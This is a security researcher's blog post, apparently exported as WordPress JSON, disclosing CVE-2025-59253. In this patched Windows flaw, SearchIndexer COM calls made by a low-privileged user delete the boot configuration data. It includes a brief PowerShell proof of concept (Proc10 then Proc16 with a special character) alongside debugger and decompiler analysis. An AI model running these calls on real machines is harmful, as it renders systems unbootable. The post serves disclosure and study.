{"id":9316,"date":"2025-11-17T15:30:27","date_gmt":"2025-11-17T14:30:27","guid":{"rendered":"https:\/\/dev.warpnet.nl\/?p=9316"},"modified":"2025-12-08T13:18:03","modified_gmt":"2025-12-08T12:18:03","slug":"deleting-the-bcd-through-com-as-low-privileged-user","status":"publish","type":"post","link":"https:\/\/warpnet.nl\/en\/blog\/deleting-the-bcd-through-com-as-low-privileged-user\/","title":{"rendered":"Deleting the BCD through COM as low privileged user"},"content":{"rendered":"<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<p class=\"has-medium-font-size\" style=\"font-style:normal;font-weight:500\">This article is written by Remco:<\/p>\n\n\n\n<div class=\"wp-block-columns are-vertically-aligned-center is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-vertically-aligned-center is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:25%\"><div class=\"wp-block-image is-style-rounded\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"2412\" height=\"2412\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120.jpg\" alt=\"\" class=\"wp-image-9317\" style=\"object-fit:cover;width:82px;height:auto\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120.jpg 2412w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-300x300.jpg 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-1024x1024.jpg 1024w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-150x150.jpg 150w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-768x768.jpg 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-1536x1536.jpg 1536w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-2048x2048.jpg 
2048w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-12x12.jpg 12w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-1080x1080.jpg 1080w\" sizes=\"(max-width: 2412px) 100vw, 2412px\"\/><\/figure>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-column is-vertically-aligned-center is-layout-flow wp-block-column-is-layout-flow\">\n<p class=\"has-text-color has-medium-font-size\" style=\"color:#1d2537\"><strong><a href=\"https:\/\/www.linkedin.com\/in\/remco-vandermeer\/\" target=\"_blank\" rel=\"noopener\">Remco van der Meer<\/a><\/strong><br>Ethical Hacker<\/p>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n\n\n\n<p class=\"has-medium-font-size\">CVE-2025-59253: Demonstrating a vulnerability in Windows that leads to a low privileged user being able to delete the boot configuration data (BCD) through COM.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Summary<\/h2>\n\n\n\n<p>During my research into Component Object Model (COM) and DCOM (Distributed COM), I stumbled upon an interesting vulnerability in the Windows <code>SearchIndexer<\/code> process. 
This vulnerability allowed a low privileged user (a user without administrative privileges or any additional tokens) to let the <code>SearchIndexer<\/code> process delete all registry keys under the <code>HKLM\\BCD<\/code> registry key, essentially making the system unbootable.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Only Windows clients, versions 10 and 11, were vulnerable.<\/li>\n\n\n\n<li>This vulnerability was fixed by Microsoft on Patch Tuesday of October 2025 (14 October 2025).<\/li>\n\n\n\n<li>For this vulnerability, a bounty was awarded and <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/advisory\/CVE-2025-59253\" target=\"_blank\" rel=\"noopener\">CVE-2025-59253<\/a> was assigned.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Discovering the vulnerability<\/h2>\n\n\n\n<p>COM\/DCOM has been an interesting component of Windows from a security perspective for many years. In the past, COM has been a target for many different purposes: not only have many vulnerabilities been discovered in COM, but it is also used for lateral movement and bypass techniques.<\/p>\n\n\n\n<p>Because of this, a lot of (security) research has already been conducted in this area, so a different approach would probably lead to better results when looking for new vulnerabilities. I couldn&#x2019;t find any tooling or blogs related to fuzzing COM\/DCOM, but correct me if I&#x2019;m wrong. As fuzzing MS-RPC has proven to be a successful approach to discovering new vulnerabilities, I wondered if the same concept could be applied to COM\/DCOM.<\/p>\n\n\n\n<p>I decided to write a fuzzer around the <a href=\"https:\/\/github.com\/tyranid\/oleviewdotnet\" target=\"_blank\" rel=\"noopener\">OleViewDotNet<\/a> tool from <a href=\"https:\/\/x.com\/tiraniddo\">James Forshaw<\/a>. 
You can find the COM-fuzzer tool <a href=\"https:\/\/github.com\/warpnet\/COM-Fuzzer\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n\n\n\n<p>I ran the fuzzer against an up-to-date Windows 11 system. After rebooting the system, it didn&#x2019;t boot at all. Instead, I was asked to choose a keyboard layout.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"633\" height=\"504\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/2.png\" alt=\"\" class=\"wp-image-9326\" style=\"width:620px;height:auto\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/2.png 633w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/2-300x239.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/2-15x12.png 15w\" sizes=\"(max-width: 633px) 100vw, 633px\"\/><figcaption class=\"wp-element-caption\">The keyboard layout chooser shown instead of the system booting<\/figcaption><\/figure>\n<\/div>\n\n\n<p>Trying to repair the system through the advanced options also didn&#x2019;t resolve the issue. Luckily, I had made snapshots before starting the fuzzer. After rolling the machine back to a working state, I ran the fuzzer again to make sure that the fuzzer actually caused the system to become unbootable and that it wasn&#x2019;t a coincidence. And yes, after fuzzing all methods again, the system was unbootable once more. Because I was fuzzing from a low privileged user context, this was very interesting.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Getting to the root cause<\/h2>\n\n\n\n<p>Because I ran my fuzzer against about 200 classes with a total of about 5000 procedures, it was hard to tell which class, let alone which procedure(s), was responsible for making the system unbootable. Since I was doing black-box fuzzing, any procedure could have been the culprit. Of course I checked the Windows logs for errors and warnings, but they were all clean. 
It actually took me 2 nights to find the right class and procedures. My approach was to split the classes in half each time, fuzz those classes, reboot the system, and repeat.<\/p>\n\n\n\n<p>I eventually noticed that sometimes the system was perfectly bootable and sometimes it wasn&#x2019;t, so I had to repeat the halving approach a couple of times over. The only class left over was Windows Search Manager with CLSID <code>7d096c5f-ac08-4f1f-beb7-5c22c517ce39<\/code>. This class has a couple of interfaces, one of which of course is the required <code>IUnknown<\/code> interface. The interface with the responsible procedures is <code>dbab3f73-db19-4a79-bfc0-a61a93886ddf<\/code>. The following is a snippet of the output of the COM Fuzzer that I wrote for this class:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; JSON\" class=\"wp-block-code\"><code lang=\"json\" class=\"language-json line-numbers\">{\n  &quot;ClassName&quot;: &quot;Windows Search Manager&quot;,\n  &quot;CLSID&quot;: &quot;7d096c5f-ac08-4f1f-beb7-5c22c517ce39&quot;,\n  &quot;Interfaces&quot;: [\n    {\n      &quot;InterfaceName&quot;: &quot;ISearchManager2&quot;,\n      &quot;IID&quot;: &quot;dbab3f73-db19-4a79-bfc0-a61a93886ddf&quot;,\n      &quot;Methods&quot;: [\n        &quot;Proc10_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc10(string p0)&quot;,\n        &quot;Proc11_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc11()&quot;,\n        &quot;int Proc12(string p0)&quot;,\n        &quot;Proc13_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc13()&quot;,\n        &quot;Proc14_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc14()&quot;,\n        &quot;Proc15_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc15()&quot;,\n        &quot;Proc16_RetVal Proc16(string p0)&quot;,\n        &quot;int Proc17(string p0)&quot;,\n        &quot;Proc3_RetVal, 
4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc3()&quot;,\n        &quot;Proc4_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc4()&quot;,\n        &quot;Proc5_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc5(string p0)&quot;,\n        &quot;int Proc6(string p0, Struct_117, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null p1)&quot;,\n        &quot;Proc7_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc7()&quot;,\n        &quot;Proc8_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc8()&quot;,\n        &quot;int Proc9(NtApiDotNet.Ndr.Marshal.NdrEnum16 p0, int p1, int p2, string p3, string p4)&quot;\n      ]\n    }\n  ]\n}<\/code><\/pre>\n\n\n\n<p>After even more trial and error, I figured out that I first had to call <code>Proc10(string p0)<\/code> before I was able to call some of the other procedures within the interface. <code>Proc10<\/code> probably initialises some object that the other procedures use as a reference, but since <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/searchapi\/nn-searchapi-isearchmanager2\" target=\"_blank\" rel=\"noopener\">the documentation for ISearchManager2<\/a> is limited, I am not sure.<\/p>\n\n\n\n<p>When calling <code>Proc16(string p0)<\/code> after <code>Proc10<\/code> with any input except special characters, the process starts deleting keys under the <code>HKLM\\SOFTWARE\\Microsoft\\Windows Search\\<\/code> registry path as <code>NT AUTHORITY\\SYSTEM<\/code>. 
This can be observed with Process Monitor using filters.<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; PowerShell\" class=\"wp-block-code\"><code lang=\"powershell\" class=\"language-powershell line-numbers\"># Get-ComClass, New-ComObject and Get-ComObjectInterface come from the OleViewDotNet PowerShell module\n$cs = Get-ComClass -Clsid 7d096c5f-ac08-4f1f-beb7-5c22c517ce39\n$IntObj = New-ComObject -Class $cs\n$ComClient = Get-ComObjectInterface -Object $IntObj -Iid dbab3f73-db19-4a79-bfc0-a61a93886ddf\n$ComClient.Proc10(&quot;a&quot;)\n$ComClient.Proc16(&quot;b&quot;)<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1144\" height=\"506\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-1024x453.png\" alt=\"\" class=\"wp-image-9327\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-1024x453.png 1024w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-300x133.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-768x340.png 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-18x8.png 18w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3.png 1144w\" sizes=\"(max-width: 1144px) 100vw, 1144px\"\/><figcaption class=\"wp-element-caption\">Registry keys being deleted as NT AUTHORITY\\SYSTEM<\/figcaption><\/figure>\n\n\n\n<p>So far, none of the keys being deleted actually harm the system. 
However, when the string input for <code>Proc16<\/code> contains a special character (such as <code>.<\/code> or <code>\/<\/code>), the process deletes everything under <code>HKLM\\BCD<\/code>.<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; PowerShell\" class=\"wp-block-code\"><code lang=\"powershell\" class=\"language-powershell line-numbers\">$ComClient.Proc16(&quot;.&quot;)<\/code><\/pre>\n\n\n\n<p>Process Monitor results:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"398\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-1024x398.png\" alt=\"\" class=\"wp-image-9328\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-1024x398.png 1024w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-300x117.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-768x299.png 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-18x7.png 18w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4.png 1119w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\/><figcaption class=\"wp-element-caption\">BCD registry keys being deleted as NT AUTHORITY\\SYSTEM<\/figcaption><\/figure>\n\n\n\n<p>That of course is a problem, because the BCD is a binary database that contains boot-time configuration parameters; it essentially tells Windows how to start up. This registry path is protected by ACLs, and only SYSTEM has full control over it.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Using WinDbg and Ghidra to find the responsible function<\/h3>\n\n\n\n<p>Now that we know which procedures are responsible for deleting the keys, we can use WinDbg and Ghidra to get a better understanding of the vulnerability. Since the whole BCD tree is deleted, it is likely that the <code>RegDeleteTree<\/code> operation is used.<\/p>\n\n\n\n<p>Using Ghidra, we load the <code>C:\\Windows\\System32\\SearchIndexer.exe<\/code> binary and disassemble it. 
Luckily for us, there is only one function that includes the <code>RegDeleteTree<\/code> operation:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1022\" height=\"207\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5.png\" alt=\"\" class=\"wp-image-9329\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5.png 1022w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5-300x61.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5-768x156.png 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5-18x4.png 18w\" sizes=\"(max-width: 1022px) 100vw, 1022px\"\/><figcaption class=\"wp-element-caption\">Searching for RegDeleteTree in Ghidra<\/figcaption><\/figure>\n\n\n\n<p>The function that includes the operation is:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; C\" class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp line-numbers\">void FUN_14007604c(undefined8 param_1,wchar_t *param_2)\n\n{\n  ulonglong uVar1;\n  LPCWSTR lpSubKey;\n  undefined1 auStack_258 [48];\n  WCHAR local_228 [264];\n  ulonglong local_18;\n  \n  local_18 = DAT_1400e1ac0 ^ (ulonglong)auStack_258;\n  uVar1 = FUN_1400103d4(param_1,-0x7ffffffe,param_2,local_228);\n  lpSubKey = local_228;\n  if ((char)uVar1 == '\\0') {\n    lpSubKey = param_2;\n  }\n  RegDeleteTreeW((HKEY)0xffffffff80000002,lpSubKey); \/* Hmmm....*\/\n  FUN_140050600(local_18 ^ (ulonglong)auStack_258);\n  return;\n}<\/code><\/pre>\n\n\n\n<p>So we see the <code>RegDeleteTreeW<\/code> call on line 16 and notice that its <code>HKEY<\/code> argument is <code>0xffffffff80000002<\/code>, which equates to <code>HKEY_LOCAL_MACHINE<\/code>. Next is <code>lpSubKey<\/code>, and we are interested in what this value is at the moment the BCD is deleted. 
So we attach WinDbg to the SearchIndexer process and look up the module&#x2019;s base address:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"739\" height=\"292\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/6.png\" alt=\"\" class=\"wp-image-9319\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/6.png 739w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/6-300x119.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/6-18x7.png 18w\" sizes=\"(max-width: 739px) 100vw, 739px\"\/><figcaption class=\"wp-element-caption\">Getting the memory address for SearchIndexer using WinDbg<\/figcaption><\/figure>\n\n\n\n<p>Back in Ghidra, we set the image base address to <code>7ff7d1c50000<\/code> and go back to the vulnerable function. The line containing the <code>RegDeleteTreeW<\/code> call has the following memory address:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"611\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-1024x611.png\" alt=\"\" class=\"wp-image-9320\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-1024x611.png 1024w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-300x179.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-768x458.png 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-18x12.png 18w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7.png 1033w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\/><figcaption class=\"wp-element-caption\">Getting the memory address for the RegDeleteTreeW line<\/figcaption><\/figure>\n\n\n\n<p>In WinDbg we set a breakpoint on this address:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; Plaintext\" class=\"wp-block-code\"><code lang=\"\" class=\"\">0:034&gt; bl\n     0 e Disable Clear  00007ff7`d1cc6090     0001 (0001)  0:**** SearchIndexer+0x76090<\/code><\/pre>\n\n\n\n<p>We are good to go. 
We resume the debugger and trigger the bug by entering the following in PowerShell:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; PowerShell\" class=\"wp-block-code\"><code lang=\"powershell\" class=\"language-powershell\">$cs = Get-ComClass -Clsid 7d096c5f-ac08-4f1f-beb7-5c22c517ce39\n$IntObj = New-ComObject -Class $cs\n$ComClient = Get-ComObjectInterface -Object $IntObj -Iid dbab3f73-db19-4a79-bfc0-a61a93886ddf\n$ComClient.Proc10(&quot;a&quot;)\n$ComClient.Proc16(&quot;,&quot;)<\/code><\/pre>\n\n\n\n<p>The breakpoint hits in WinDbg:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; Plaintext\" class=\"wp-block-code\"><code class=\"\">00007ff7`d1cc6090 48ff1509030400  call    qword ptr [SearchIndexer+0xb63a0 (00007ff7`d1d063a0)] ds:00007ff7`d1d063a0={KERNELBASE!RegDeleteTreeW (00007ffe`3c2479f0)}<\/code><\/pre>\n\n\n\n<p>We can now view the register values.<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; Plaintext\" class=\"wp-block-code\"><code class=\"\">0:035&gt; r\n\nrax=0000000000000000 rbx=0000008002ee1798 rcx=ffffffff80000002\nrdx=0000008002ee1798 rsi=0000008002d3fb84 rdi=00000080040efb00\nrip=00007ff7d1cc6090 rsp=000000800357dc90 rbp=000000800357e140\n r8=0000008002ee1798  r9=000000800357dcc0 r10=00007ffe3c8b0000\nr11=000000800357dc70 r12=00000080024ddda0 r13=00007ff7d1d08d80\nr14=0000000000000000 r15=00000080040efb00\niopl=0         nv up ei pl zr na po nc\ncs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246\nSearchIndexer+0x76090:\n00007ff7`d1cc6090 48ff1509030400  call    qword ptr [SearchIndexer+0xb63a0 (00007ff7`d1d063a0)] ds:00007ff7`d1d063a0={KERNELBASE!RegDeleteTreeW (00007ffe`3c2479f0)}<\/code><\/pre>\n\n\n\n<p>We can use <code>da<\/code> to display the memory that <code>rsi<\/code> points to as an ASCII string:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; Plaintext\" class=\"wp-block-code\"><code class=\"\">0:035&gt; da @rsi\n00000080`02d3fb84  &quot;,&quot;<\/code><\/pre>\n\n\n\n<p>There is the comma that we gave as input to the <code>Proc16<\/code> function, great. 
If we provide <code>t,est<\/code> as input, we only see <code>t<\/code> as the value of <code>rsi<\/code>. This means that our user input, or at least its first character, ends up in the subkey path passed to <code>RegDeleteTreeW<\/code>. This somehow causes the function to delete the first subkey of <code>HKLM<\/code>, which is <code>HKLM\\BCD<\/code> by default. To prove this, I set up a system without <code>HKLM\\BCD<\/code>, so that the first subkey becomes <code>HKLM\\HARDWARE<\/code>. If we now make the COM calls, Process Monitor shows that the process deletes the <code>HKLM\\HARDWARE<\/code> path:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"709\" height=\"266\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/8.png\" alt=\"\" class=\"wp-image-9321\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/8.png 709w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/8-300x113.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/8-18x7.png 18w\" sizes=\"(max-width: 709px) 100vw, 709px\"\/><figcaption class=\"wp-element-caption\">Process Monitor showing that SearchIndexer removes the HKLM\\HARDWARE path<\/figcaption><\/figure>\n\n\n\n<p>I was not able to craft user input for the COM function that makes it delete a different path instead of the first subkey. The reason why only the first character of the user input ends up in the registry path lies deeper within the Windows Search process, which I didn&#x2019;t reverse. Still, it is an interesting bug that leads to an unusable system.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Impact<\/h2>\n\n\n\n<p>The whole reason this is a security vulnerability is that a low privileged user on the system can execute the responsible COM functions. 
For malware this could be of interest, because it allows making the system(s) unbootable from a non-administrative context.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion and timeline<\/h2>\n\n\n\n<p>This blog post described how the fuzzing approach led to the discovery of an interesting vulnerability that allows a low-privileged user to delete all registry values under the path <code>HKLM\\BCD<\/code>. This vulnerability was disclosed to Microsoft, and CVE-2025-59253 was assigned together with a bounty. I expect to find more interesting bugs using the fuzzing approach and will soon be releasing the tool itself.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>29-07-2025 &#x2013; Reported the vulnerability to Microsoft<\/li>\n\n\n\n<li>30-07-2025 &#x2013; Case opened by Microsoft<\/li>\n\n\n\n<li>12-08-2025 &#x2013; Confirmation of behaviour<\/li>\n\n\n\n<li>13-08-2025 &#x2013; Bounty awarded<\/li>\n\n\n\n<li>14-10-2025 &#x2013; Fix available in Patch Tuesday, CVE-2025-59253 assigned<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>During his research into Component Object Model (COM) and DCOM (Distributed COM), our colleague Remco stumbled upon an interesting vulnerability in the Windows SearchIndexer process. 
This vulnerability allowed a low privileged user (user without administrative privileges or any additional tokens), to let the SearchIndexer process delete all registry keys under the HKLM\\BCD registry key, essentially making the system unbootable.<\/p>","protected":false},"author":17,"featured_media":9325,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","content-type":"","footnotes":""},"categories":[14],"tags":[],"class_list":["post-9316","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"acf":[],"_links":{"self":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/9316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/users\/17"}],"replies":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/comments?post=9316"}],"version-history":[{"count":5,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/9316\/revisions"}],"predecessor-version":[{"id":9938,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/9316\/revisions\/9938"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/media\/9325"}],"wp:attachment":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/media?parent=9316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/categories?post=9316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/tags?post=9316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}